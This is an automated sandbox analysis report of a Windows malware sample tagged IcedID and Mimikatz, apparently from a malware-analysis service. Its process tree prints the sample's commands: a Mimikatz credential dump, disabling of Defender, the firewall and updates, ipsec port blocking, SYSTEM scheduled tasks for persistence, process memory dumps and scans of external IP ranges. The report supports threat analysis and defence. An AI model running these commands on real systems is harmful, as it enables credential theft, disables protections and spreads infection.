Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
-
submitted
19-06-2024 13:07
General
-
Target
2024-06-19_e9311bd4801398cc8fbf97d57a317ff1_hacktools_icedid_mimikatz.exe
-
Size
8.0MB
-
MD5
e9311bd4801398cc8fbf97d57a317ff1
-
SHA1
46cc56fc9c8c035706407f974d76f558e4a2f1f9
-
SHA256
646a378d241305869aa39665c0a72ebc73cdec01fcd30e78846ba4dcc101a6e6
-
SHA512
1530c555ef289b22990147e83daa888bc4f5fa26904182374bdd38ff2107ea0e3f6dba90596f9c646bb11158c9de307f9c6a56a6277f2eb8ae43cdbc0215e9be
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (30371) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
-
UPX dump on OEP (original entry point) 41 IoCs
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 37 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\jtcrhevmb\queeqb.exe"C:\Windows\TEMP\jtcrhevmb\queeqb.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-06-19_e9311bd4801398cc8fbf97d57a317ff1_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-06-19_e9311bd4801398cc8fbf97d57a317ff1_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\nkhhqptb\gzytqet.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\nkhhqptb\gzytqet.exeC:\Windows\nkhhqptb\gzytqet.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\nkhhqptb\gzytqet.exeC:\Windows\nkhhqptb\gzytqet.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ebzqcqhuz\qzalaeiar\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\ebzqcqhuz\qzalaeiar\wpcap.exeC:\Windows\ebzqcqhuz\qzalaeiar\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ebzqcqhuz\qzalaeiar\uksnlcitz.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ebzqcqhuz\qzalaeiar\Scant.txt2⤵
-
C:\Windows\ebzqcqhuz\qzalaeiar\uksnlcitz.exeC:\Windows\ebzqcqhuz\qzalaeiar\uksnlcitz.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ebzqcqhuz\qzalaeiar\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ebzqcqhuz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ebzqcqhuz\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\ebzqcqhuz\Corporate\vfshost.exeC:\Windows\ebzqcqhuz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "msqqzesfv" /ru system /tr "cmd /c C:\Windows\ime\gzytqet.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "msqqzesfv" /ru system /tr "cmd /c C:\Windows\ime\gzytqet.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ekytbahia" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nkhhqptb\gzytqet.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ekytbahia" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nkhhqptb\gzytqet.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bclnqqlqz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\jtcrhevmb\queeqb.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bclnqqlqz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\jtcrhevmb\queeqb.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 804 C:\Windows\TEMP\ebzqcqhuz\804.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 376 C:\Windows\TEMP\ebzqcqhuz\376.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 2060 C:\Windows\TEMP\ebzqcqhuz\2060.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 2600 C:\Windows\TEMP\ebzqcqhuz\2600.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 2912 C:\Windows\TEMP\ebzqcqhuz\2912.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 2148 C:\Windows\TEMP\ebzqcqhuz\2148.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 3096 C:\Windows\TEMP\ebzqcqhuz\3096.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 3752 C:\Windows\TEMP\ebzqcqhuz\3752.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 3840 C:\Windows\TEMP\ebzqcqhuz\3840.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 3932 C:\Windows\TEMP\ebzqcqhuz\3932.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 4016 C:\Windows\TEMP\ebzqcqhuz\4016.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 4540 C:\Windows\TEMP\ebzqcqhuz\4540.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 1628 C:\Windows\TEMP\ebzqcqhuz\1628.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 3116 C:\Windows\TEMP\ebzqcqhuz\3116.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 1100 C:\Windows\TEMP\ebzqcqhuz\1100.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 3256 C:\Windows\TEMP\ebzqcqhuz\3256.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 1420 C:\Windows\TEMP\ebzqcqhuz\1420.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ebzqcqhuz\tzglccltt.exeC:\Windows\TEMP\ebzqcqhuz\tzglccltt.exe -accepteula -mp 4992 C:\Windows\TEMP\ebzqcqhuz\4992.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\ebzqcqhuz\qzalaeiar\scan.bat2⤵
-
C:\Windows\ebzqcqhuz\qzalaeiar\qrbtbpeqj.exeqrbtbpeqj.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\hmdriy.exeC:\Windows\SysWOW64\hmdriy.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\gzytqet.exe1⤵
-
C:\Windows\ime\gzytqet.exeC:\Windows\ime\gzytqet.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\jtcrhevmb\queeqb.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\jtcrhevmb\queeqb.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nkhhqptb\gzytqet.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\nkhhqptb\gzytqet.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\gzytqet.exe1⤵
-
C:\Windows\ime\gzytqet.exeC:\Windows\ime\gzytqet.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\jtcrhevmb\queeqb.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\jtcrhevmb\queeqb.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nkhhqptb\gzytqet.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\nkhhqptb\gzytqet.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
25.9MB
MD50ad1dda9e2faea1f76b8620188960625
SHA12652c08bbf442eeee57a96b762e8ab44e098d3e9
SHA256edf06465f9a941a612757de5170b99e2cd9bae35ca070790cda7cee4107d8dbe
SHA512c7c7f02d416d4cf5b93bc848342aa74e3a5628f007bebb23565ddec847853fd833d1aefca6a08b56f4ef7b1632d03bfeb00372968f1faef731576ec0d1c6f0fa
-
Filesize
4.1MB
MD5cc895c5f8ed1cee813c586f655eccc76
SHA12f75874884ccb4bf3bb12dfe63b0e3d9e0ed629c
SHA256edb17d194817dac970f5c7843d976ceaaded19ef75819353aaae7c2c2c0dcd9e
SHA5128e5f9b5b6dd3416198ddebe23d69b668a38df60c5caaabd6214a9f3fca326265df68612c8f64bb7569922efa9b0f604d45814e836e0928ea1e5f40c5e796ad5b
-
Filesize
3.9MB
MD5e6a9947447eb8aa5c900bff828b753d6
SHA107db211aa8199d8b087fc8a4c372af6beb0bebd2
SHA256e620437bfe36d075b1f91899fcf25e111b2257dcb375ddd692e388274f86251d
SHA5129685be1bdb4e16400cddb27e00fe3ee83464220a6e5b6d6a1c9970333d33425274e9bb18bb4136d5a929a2548d9b84ee24e0916515ea58d8d3c150527c08488d
-
Filesize
7.6MB
MD585238aa447797f54ef5134b2aafb9aae
SHA139d1b79c40723a36652fecb0561ceb556b107186
SHA256f71c7f9f09037471efb23b5ab3646b1f6f6606d24ec1fe10fafa6100e44ba55c
SHA512159419ac2590fac9e54ad676807f551affebbb2f55add359cafb69240a0d53fb8f67c54276d9222dfae8e9b61b0209f959a67828d126903ed599de383b8d211a
-
Filesize
810KB
MD5e93487598be74b28bf928ab18e300163
SHA11249fe3126412bdce5161db904074d0e06ce97cd
SHA256bc7905b6aea52a849496fe5c819bc6f709d8eccc4576c6cd4f991de92018f9ab
SHA51259cb9aa5672a6d4131e642c9a9fc73e6df9499fc6089f0367104c515555caef8bf359765963d12df82317f1e851909f617bb529df51e9bc57c891f6fb07a2d35
-
Filesize
2.9MB
MD5cfee95ef9aef14122bdcc784d0992fe1
SHA14a45eb8efa4e79001aeba3a592ee5ab38a22c024
SHA2568ec25ab1b2b084ab02c560d2369f2236a0b5fcb9e9a501683ad70f14be20b3a8
SHA51270fb8c076b14224af88068f3cf7aecd851853910fa4ecf5eb154cb59add6a001955b1ec6c768a26b7febf568ec24d32dd25fee0f70660dc6997bb14659342db8
-
Filesize
8.8MB
MD58a5b70cdeeffe89b0b422fbb275440e9
SHA18e6c2e77775b1f9b3ec0913f7a19b618ddada646
SHA256eeb3e951de325c4581fc8d6ba60995613dcaefb85686345ea4e72269a5773f3a
SHA5120d6d0cf46ea87649a7ac2064ed324587387b52a0da86a4b810a8b23d3b43b92fd7477b2a3ced307257bef47f5ca61921d017b8035f3ec81aff837f3437ef33c4
-
Filesize
2.7MB
MD518b1160e5546843bf9301b63e62ef913
SHA15aed16c42dbe536aad2b6b6395ded8ea6d692d4b
SHA256b86c54005e70501a57a91f8aabb00038e0e96a8096114265e726ccedac685604
SHA512c3471b1292d233976f200db56c7a74d60dbecfbc0448fb3e537d842d9190d07339e4239144d0348768bfb897a02b8ac5a8eab1e7fe85e46b5dc1eb3e9f00c937
-
Filesize
33.5MB
MD530a9fb573082c3ea5bb059fd121ee366
SHA1d09136b59a072eb6090624d709867dbf1f171b28
SHA256ee9527975c0580f7660580a08451adc18ce337f51a06044c537e8152cf8d14f5
SHA512076bbaef1e04352a7db8f1d024c16835a19eff83ece7b090f3ebe13a26ba03e8bb77a826656fa08ae9f07cc7faa5f17a0981a0eb7cc0b6745a546c643884f0c1
-
Filesize
20.8MB
MD5087ed3a213cdf3df32f4b9e578475c6a
SHA1c86775481d542e0c1274836a650e0bf733487ebb
SHA25693364dbeed1d4e967b909d7f988b7987b244126ad2554c780dbf4431f7fdc7c0
